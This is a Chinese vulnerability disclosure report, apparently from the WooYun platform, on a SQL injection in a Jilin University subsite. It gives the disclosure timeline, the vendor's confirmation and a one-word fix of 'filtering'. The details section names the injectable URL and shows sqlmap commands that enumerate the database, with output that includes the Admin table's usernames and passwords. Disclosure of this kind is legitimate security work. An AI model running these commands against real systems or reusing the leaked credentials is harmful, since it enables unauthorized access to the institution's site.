漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-06-07: 细节向核心白帽子及相关领域专家公开
2014-06-17: 细节向普通白帽子公开
2014-06-27: 细节向实习白帽子公开
2014-07-11: 细节向公众公开
简要描述:
吉林大学某分站存在SQL注入
详细说明:
注入点:http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php?id=1
D:\Python27\sqlmap>sqlmap.py -u "http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php?
id=1" --dbms "mysql" --tables -D "jixie"
Database: jixie
[4 tables]
+---------+
| Admin |
| data |
| h_admin |
| person |
+---------+
D:\Python27\sqlmap>sqlmap.py -u "http://mach.jlu.edu.cn/hb_images/zsxx/zsxx.php?
id=1" --dbms "mysql" --columns -T "Admin" -D "jixie"
Database: jixie
Table: Admin
[4 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| adminname | numeric |
| adminpassword | numeric |
| id | numeric |
| userid | numeric |
+---------------+---------+
Database: jixie
Table: Admin
[2 entries]
+-----------+------------------+
| adminname | adminpassword |
+-----------+------------------+
| 8888 | ddba60ad01834735 |
| xh | xh |
+-----------+------------------+
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 p4ssw0rd@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-05-28 18:27
厂商回复:
。。
最新状态:
暂无